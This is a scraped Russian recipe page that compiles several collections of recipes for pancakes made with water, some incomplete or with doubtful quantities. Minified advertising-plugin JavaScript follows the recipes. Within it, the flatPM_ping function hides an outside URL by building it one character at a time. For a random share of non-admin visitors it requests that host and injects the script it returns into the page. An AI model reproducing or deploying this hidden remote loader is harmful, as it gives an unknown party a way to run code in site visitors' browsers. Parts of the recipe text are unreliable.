Блины на воде

7 отличных рецептов блинов на воде

Выпечка на обычной и газированной воде будет тонкой, красивой и вкусной даже без молочных продуктов.

1. Блины на воде с яйцами

Классический беспроигрышный рецепт.

Ингредиенты

  • 3 яйца;
  • ½ чайной ложки соли;
  • 1 столовая ложка сахара;
  • 500 мл воды;
  • ½ чайной ложки разрыхлителя;
  • 200–220 г муки;
  • 2 столовые ложки растительного масла + для смазывания.

Приготовление

Взбейте яйца с солью и сахаром. Влейте тёплую воду и взбейте ещё раз. Всыпьте разрыхлитель и муку и перемешайте до однородной консистенции. Добавьте в готовое тесто масло и оставьте на 10 минут.

Смажьте сковороду и хорошенько её разогрейте. Выкладывайте тесто тонким слоем и готовьте на среднем огне до румяности со всех сторон.

Периодически сковороду нужно смазывать маслом.

Подберите вкусное дополнение 🍓

2. Блины на воде без яиц

Вкусные блины практически из ничего.

Ингредиенты

  • 200 г муки;
  • щепотка ванилина;
  • 1 столовая ложка сахара;
  • 400 мл воды;
  • ½ чайной ложки соды;
  • 50 мл растительного масла + для смазывания.

Приготовление

Соедините муку, ванилин и сахар. Влейте воду и тщательно взбейте. Добавьте соду и масло и ещё раз хорошенько перемешайте.

Раскалите сковороду, смазанную маслом. Распределите по дну тонкий слой теста и обжаривайте на среднем огне до румяности с обеих сторон.

Периодически сковороду нужно смазывать маслом.

Добавьте в закладки 🥚

3. Ажурные блины на газированной воде

Тонкие и мягкие блины с дырочками.

Ингредиенты

  • 200 г муки;
  • щепотка соли;
  • 1 столовая ложка сахара;
  • ¼ чайной ложки соды;
  • 500 мл газированной воды;
  • 3 столовые ложки растительного масла + для смазывания.

Приготовление

Соедините муку, соль, сахар и соду. Помешивая венчиком, влейте половину газированной воды. Тесто должно получиться однородным. Добавьте оставшуюся воду и масло и ещё раз перемешайте.

Раскалите сковороду, смазанную маслом. Распределите по дну тонкий слой теста и обжаривайте на среднем огне до золотистого цвета с обеих сторон.

Смазывать сковороду нужно перед приготовлением каждого блина.

Попробуйте 🥞

4. Дрожжевые блины на воде

Выпечка будет вкусной и слегка ажурной.

Ингредиенты

  • 20 г прессованных дрожжей;
  • 1 столовая ложка сахара;
  • 800 мл воды;
  • 220 г муки;
  • 3 яйца;
  • ½ чайной ложки соли;
  • 6 столовых ложек растительного масла + для смазывания.

Приготовление

Раскрошите дрожжи, добавьте половину сахара и залейте примерно 100 мл тёплой воды. Всыпьте 1–2 столовые ложки просеянной муки и перемешайте. Накройте пищевой плёнкой и уберите в тёплое место на 15–20 минут.

В глубокой ёмкости взбейте яйца с оставшимся сахаром. Добавьте всю тёплую воду и соль и взбейте ещё раз. Влейте дрожжевую смесь и перемешайте.

Порционно вводите просеянную муку, стараясь при этом добиться однородности массы. Добавьте в тесто масло, накройте плёнкой и оставьте в тёплом месте на 20–30 минут.

Раскалите смазанную сковороду. Выложите часть теста и готовьте на среднем огне до золотистого цвета со всех сторон.

Смазать сковороду можно только перед приготовлением первого блина.

Приготовьте 🥛

5. Банановые блины на газированной воде

Вкусные блинчики с фруктовым ароматом.

Ингредиенты

  • 2 банана (общий вес примерно 360 г вместе с кожурой);
  • 600 мл газированной воды;
  • щепотка соли;
  • ⅓ чайной ложки разрыхлителя;
  • 3 столовые ложки растительного масла + для смазывания;
  • 160 г белой муки;
  • 170 г цельнозерновой муки.

Приготовление

Пюрируйте бананы погружным блендером. Влейте примерно 100 мл газированной воды и пробейте блендером ещё раз. Добавьте соль, разрыхлитель, масло и 200 мл воды.

Всыпьте смесь белой и цельнозерновой муки и перемешайте до однородной консистенции, постепенно подливая оставшуюся воду. Дайте тесту постоять 20–30 минут.

Хорошенько разогрейте сковороду и смажьте маслом. Распределите по ней слой теста и обжаривайте на среднем огне до румяности со всех сторон.

Периодически сковороду нужно смазывать маслом.

Побалуйте себя и близких 🍌

6. Цветные блины на воде

Яркий цвет выпечке придаст натуральный краситель — свёкла.

Ингредиенты

  • 250 г муки;
  • 1 чайная ложка соли;
  • 1 столовая ложка сахара;
  • 1 яйцо;
  • 400 мл воды;
  • 1 варёная свёкла;
  • 50 мл растительного масла + для смазывания.

Приготовление

Соедините просеянную муку с солью и сахаром. Добавьте яйцо и половину воды и хорошенько перемешайте. Добавьте свёклу, натёртую на мелкой тёрке, и ещё раз перемешайте до однородности. Влейте оставшуюся воду и масло.

Смажьте сковороду и хорошенько разогрейте. Распределите по ней часть теста и готовьте на среднем огне до румяности с обеих сторон.

Периодически сковороду можно смазывать маслом.

Разнообразьте меню 🥞

7. Шоколадные блины на газированной воде

Ароматная выпечка с какао.

Ингредиенты

  • 150 г муки;
  • ½ чайной ложки соли;
  • ½ чайной ложки разрыхлителя;
  • 1 столовая ложка какао-порошка;
  • 1 столовая ложка сахара;
  • 250 мл газированной воды;
  • 3 столовые ложки растительного масла + для смазывания.

Приготовление

Соедините муку, соль, разрыхлитель, какао и сахар. Влейте воду и масло и тщательно взбейте миксером до однородного состояния.

Смажьте сковороду и хорошенько разогрейте. Выложите часть теста и выпекайте на среднем огне до румяности с обеих сторон.

Смазать сковороду маслом можно только перед первым блином.

Блины на воде

Как же много разных рецептов блинов, панкейков, крепов и т.д.! Я люблю часто экспериментировать. Каждый раз хочется попробовать что-то новое, не избитое, но если я хочу быть уверена, что все получится, то я всегда возвращаюсь к этому рецепту, ведь именно так готовила блины моя мама. И на уроках труда нас тоже учили печь блины по этому рецепту. Особенно он актуален, когда в доме нет молока или оно прокисло.

А еще мне нравится, что они делаются на раз-два и со сковороды снимаются прекрасно.

На фото не вся стопка, потому, как сынишка таскал по одному. Хорошо, хоть мужа на тот момент не было дома, а то, наверное, остался бы только один, как это произошло вечером 🙂

Я уверена, что с этим рецептом справится и ребенок, ведь когда я сама впервые их пекла мне было лет 9. Помню, как обрадовала маму, когда она вернулась с работы, а на столе стояла стопка блинов. Она меня похвалила, от чего я была на седьмом небе от счастья!

Ну что, приступим к процессу приготовления?

  • Общее время готовки – 0 часов 40 минут
  • Активное время готовки – 0 часов 40 минут
  • Стоимость – очень экономно
  • Калорийность на 100 гр – 143 ккал
  • Количество порций – 6 порций

Выбери, куда сохранить рецепт:

Хотите сохранить себе этот рецепт?
Выберите, куда:

Как приготовить блины на воде

Ингредиенты:

  • Вода – 1 л кипяченая
  • Яйцо куриное – 4 шт.
  • Соль – по вкусу
  • Мука пшеничная – 2.5 чаш.(250 мл) смотрите сами может понадобиться больше или меньше
  • Масло растительное – 4 ст.л.
  • Сахар – 3 ст.л.

Приготовление:

Для приготовления блинов на воде нам понадобится совсем нехитрый набор продуктов.

Во-первых, нам нужен один литр воды. Ее необходимо брать кипяченую и охлажденную. Это можно сделать заранее.

В небольшую миску вбить четыре куриных яйца, размешать венчиком, но не надо усердствовать. К яйцам добавить соль и сахар, еще раз перемешать.

Теперь в миску большего размера влить один литр воды , вмешать в нее яичную смесь и очень хорошо перемешать.

Муку для блинов на воде надо просеять и постоянно мешая небольшими порциями добавлять ее в миску. Старайтесь, чтобы не образовывалась комков, поэтому очень важно постоянно мешать.

Теперь по поводу муки. У меня ушло 2,5 чашки, но это не говорит о том, что у вас уйдет именно это количество муки. Здесь многое зависит от качества вашей муки, категории яиц и т.д. Тесто должно получиться более жидкое, чем то, что мы обычно делаем для оладий. Благодаря этому блинчики получаются тонкими .

Теперь дело осталось за малым – в тесто нужно влить растительное масло, тоже постоянно перемешивая венчиком.

Теперь переходим непосредственно к приготовлению блинов. Для этого необходимо разогреть сковороду. У меня специальная блинная сковорода, она с антипригарным покрытием, поэтому растительным маслом я ее не смазываю. А вы смотрите по ситуации.

Я люблю тонкие блинчики, поэтому стараюсь как можно меньше вливать в сковороду теста, чуть меньше половины половника. Возвращаем сковороду обратно на огонь и ждем, когда блинчик подрумянится.

Переворачиваем блин. Я это делаю руками, привычка, но можно переворачивать с помощью лопатки или ножа, вилки и т.д.

Как только блин подрумянился с другой стороны, снимаем его со сковороды, укладываем на тарелку и приступаем к другому. И так повторяем, пока не закончится тесто.

Все, теперь можно попробовать то, что у нас получилось, если, конечно, домочадцы не сделают это раньше, ведь они так любят хватать с тарелки горячие блинчики.

Разливаем по кружкам чай или кофе, нарезаем фрукты (в моем случае красные апельсины), так же подойдут любые ягоды, шоколад, сгущенное молоко или варенье, как вам больше нравится.

Блины на воде – 8 рецептов как у бабушки

Ксения Гарастюк • 05.03.2019

Блины на воде хороши не только во время поста. Они получаются более эластичными и тонкими, чем обычные.

Количество компонентов в рецептах сведено до минимума, что позволяет экономить семейный бюджет. К тому же тонкие блины на воде более полезны для фигуры. Если вы будете выпекать их без использования, то получите лёгкий и малокалорийный завтрак. Их можно фаршировать или просто смазывать маслом.

Во время приготовления руководствуйтесь главным правилом – смешивайте отдельно сухие компоненты, отдельно жидкие, а потом соединяйте. Тогда у вас получатся вкусные и эластичные блинчики.

По консистенции тесто должно получиться, как густая сметана. Дайте ему немного настояться перед использованием. В состав кладите ингредиенты комнатной температуры, иначе тесто будет менее пышным.

Блины на воде с яйцами

Чем больше вы кладёте яиц в тесто, тем блинчики получатся более пышными. Нежное тесто получается, если взбивать яйца миксером.

Ингредиенты:

  • 3 яйца;
  • 2 ст.ложки сахарного песка;
  • 2 стакана воды;
  • 2 стакана муки;
  • 1 ст.ложка масла растительного.

Приготовление:

  1. В воду комнатной температуры разбейте яйца. Взбейте смесь при помощи миксера.
  2. Влейте масло.
  3. Муку просейте. Смешайте её с сахаром и солью.
  4. Соедините жидкие и сухие компоненты, вливая воду тонкой струёй в муку.
  5. Тщательно перемешайте, чтобы не было комков. Оставьте тесто на 20 минут. Выпекайте блины.

Блины на воде с молоком

Этот вариант рецепта не подходит для поста, но идеален, если вы хотите сделать фаршированные блинчики – они не порвутся при сгибе, а сама основа получается не слишком толстой и не приторной.

Ингредиенты:

  • 200 мл. воды;
  • полстакана муки;
  • 200 мл. молока;
  • 1 ст.ложка сахарного песка;
  • 1 яйцо;
  • 2 ст.ложки масла растительного.

Приготовление:

  1. В чуть тёплое молоко влейте воду комнатной температуры. Разбейте яйцо. Взбейте миксером.
  2. Добавьте масло. Перемешайте.
  3. Муку просейте. Всыпьте сахар, посолите. Перемешайте.
  4. Тонкой струёй влейте жидкую смесь в сухую. Тщательно перемешайте или взбейте миксером. Дайте настояться тесту в течение 20 минут.

Пышные блины на воде

Благодаря дрожжам блинчики получаются более толстыми и сытными. Их можно подавать с джемом или поливать сиропом.

Ингредиенты:

  • 400 гр. муки;
  • 400 мл. воды;
  • пакетик сухих дрожжей (20 гр);
  • 2 ст.ложки масла растительного;
  • 100 гр. сахарного песка;
  • 1 ч.ложка соли.

Приготовление:

  1. Сначала необходимо приготовить опару на основе дрожжей. Для этого залейте их стаканом тёплой воды, добавьте большую ложку сахара и немного муки. Поставьте в тёплое место.
  2. Опара считается готовой, когда сверху подёрнется плёнкой.
  3. Муку просейте, смешайте её с сахаром.
  4. Тонкой струйкой введите стакан воды. Добавьте масло. Тщательно перемешайте. Не забудьте в процессе посолить.

Блины на воде без яиц

Не менее вкусными получаются блинчики и без яиц. Вы можете придать тесту ванильный аромат, если добавите немного порошка в процессе замешивания. В этом рецепте пышность достигается за счёт соды.

Ингредиенты:

  • 4 ст.ложки сахарного песка;
  • 1 стакан муки;
  • 2 ст.ложки масла растительного;
  • 1 стакан воды;
  • щепотка ванилина;
  • 1 ч.ложка соды.

Приготовление:

  1. Муку просейте. Смешайте с ванилином и сахаром. Добавьте соду. Посолите. Тщательно перемешайте смесь.
  2. Тонкой струёй влейте едва подогретую воду. Добавьте масло.
  3. Взбейте жидкую смесь миксером.
  4. Дайте тесту настояться 20-30 минут.

Блинчики на минеральной воде

Благодаря газам, содержащимся в воде, достигается эффект брожения и тесто приподнимается. Такое тесто не рекомендуется долго настаивать. Следите, чтобы все компоненты были комнатной температуры, а бутылку с минеральной водой перед добавлением можно хорошенько потрясти.

Ингредиенты:

  • 1 стакан минеральной воды с газом;
  • 1 яйцо;
  • 1 стакан муки;
  • 2 ст.ложки масла растительного;
  • 2 ст.ложки сахарного песка.

Приготовление:

  1. Просейте муку.
  2. Добавьте в неё сахар и соль. Перемешайте.
  3. Аккуратно вливайте минералку.
  4. Перемешайте тесто до однородной консистенции.
  5. Влейте масло и разбейте яйцо. Тщательно перемешайте.
  6. Выпекайте блинчики на разогретой сковородке.

Блинчики с лимонным соком

Пышные и сытные блины получаются благодаря соде, она гасится лимонным соком. Он в свою очередь придаёт характерный цитрусовый аромат, который идеально дополняет сладкую начинку.

Ингредиенты:

  • ½ лимона;
  • ½ ч.ложки соды;
  • 2 стакана воды;
  • 300 гр. муки;
  • 1 ст.ложка сахарного песка;
  • 3 ст.ложки масла растительного.

Приготовление:

  1. Муку просейте, смешайте с сахаром.
  2. Выжмите из лимона сок. Добавьте его в соду. Полученную смесь влейте к муке, перемешайте.
  3. Вливайте воду тонкой струёй. Добавьте масло. Взбейте миксером смесь.

Блины на воде с дырочками

Красивые ажурные блинчики получаются из заварного теста. Не жалейте сил и времени на взбивание. Чем лучше вы поработаете миксером, тем вкуснее получится тесто.

Ингредиенты:

  • 3 яйца;
  • 300 гр. муки;
  • 2 стакана воды;
  • 1/3 ч.ложки соды;
  • 3 ст.ложки масла растительного;
  • 2 ст.ложки сахарного песка.

Приготовление:

  1. Перед использованием вскипятите воду, её следует добавлять горячей.
  2. Муку заранее просейте.
  3. Разбейте яйца. Добавьте соль. Взбивайте миксером минут 5-7.
  4. Влейте стакан воды комнатной температуры. Взбивайте ещё 2 минуты.
  5. Тонкой струйкой засыпьте муку. Снова взбейте смесь миксером.
  6. В стакан кипятка всыпьте соду. Перемешайте и влейте в тесто.
  7. Добавьте масло и сахар. Перемешайте.
  8. Дайте тесту настояться минут 20.

Ажурные блинчики на воде

Хотите удивить гостей красивыми блинами – не поленитесь и взбейте отдельно яичные желтки и белки. Этот небольшой нюанс преображает конечный результат.

Ингредиенты

  • 40 гр. муки;
  • 1 ст.ложка сахарного песка;
  • 700 мл. воды;
  • 2 яйца.

Приготовление:

  1. Муку просейте.
  2. Отделите белки от желтков. Отдельно взбейте миксером и те, и другие.
  3. В воду поочерёдно введите сначала желтки потом белки.
  4. Муку смешайте с сахаром и солью.
  5. Введите муку в жидкую смесь тонкой струйкой.
  6. Взбейте миксером.

Такие простые рецепты не требуют много времени для приготовления, блинчики получаются очень вкусными. Вы можете смазывать их вареньем, поливать сиропом или фаршировать любой начинкой.

Блины на воде с яйцами тонкие с дырочками

Здравствуйте, хозяюшки и хозяева!

Сегодня у нас в подборке рецепты тонких, вкусных и аппетитных блинчиков на воде с яйцами.

Если дома нет молока, а блинов захотелось — не беда, можно приготовить отличные блины на воде и они будут ничуть не хуже обычных!

Сегодня в статье:

Рецепт тонких блинов на воде

Ингредиенты
  • Яйца — 3 шт
  • Вода — 600 мл
  • Сахар — 1 ст. л
  • Соль — 1/2 ч. л
  • Подсолнечное масло — 2 ст. л
  • Мука — 400 гр
Приготовление

В миску разбейте яйца, всыпьте сахар, подсолите. Вливаем туда же воду.

Яйца с водой взбиваем миксером, чтобы получилась такая пенистая водичка.

Вливаем туда же подсолнечное масло и, начиная потихоньку подсыпать просеянную муку, снова взбиваем миксером.

У вас получится жиденькое, текучее тесто. Хорошо прогреваем антипригарную сковороду и начинаем выпекать блинчики.

Они прожариваются даже быстрее, чем блинчики на молоке.

Подрумяниваем-переворачиваем-снова подрумяниваем и готово!

Не забываем тоненько промазать маслом.

Чтобы у блинов не было сухого края, кладите их один на другой, промазывайте маслом и накройте сверху тарелкой.

Даже если изначально у блинов был сухой и хрустящий край, после того как блины полежат все вместе под тарелкой, края размягчаются и будут мягкими.

Тонкие блинчики на воде очень вкусный рецепт

Если раньше у вас не получались блины на воде, попробуйте приготовить по этому рецепту:

Такие блины получаются у всех.

Блины на воде с яйцами заварные тонкие и вкусные

Отличный рецепт для выпечки тонких блинчиков без молока.

Ингредиенты
  • Мука — 320 гр
  • Вода комнатной t — 400 мл
  • Вода горячая — 100 мл
  • Яйца — 2 шт
  • Подсолнечное масло — 3 ст. л
  • Сахар — 1 ст. л
  • Соль — 1,5 ч. л
Приготовление

Для начала отделяем желтки от белков. Белки уберем на время, а желтки взбиваем венчиком с солью.

Во взбитые желтки добавляем воду комнатной температуры, хорошо размешиваем и взбиваем.

Просеиваем к желткам, разведенным с водой, муку. Замешиваем однородное полужидкое тесто.

Мука должна разойтись полностью. Дайте тесту постоять 10 минут и влейте горячую воду (70-80 градусов).

Размешайте. Тесто станет более жидким.

Тем временем в белки добавьте сахар и взбейте их вместе, не доводя до крепкой пены. Вливаем взбитые белки к тесту.

Взбитые белки придадут тесту воздушность и блинчики получатся с дырочками.

Последним в тесто добавим растительное масло. Еще раз хорошо размешаем.

Выпекаем блинчики на хорошо прогретой сковороде, давая хорошо подрумяниться.

Первый блин может получится не очень дырчатым, но последующие как правило получаются отличными.

Очень дырчатые блины на воде с манкой

Очень интересный рецепт блинчиков на воде. Они получаются очень вкусными и дырчатыми!

Вот такие рецепты, друзья. Как видите, все они похожи, с незначительными вариациями.

Выбирайте рецепт, который вам приглянулся и смело готовьте

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};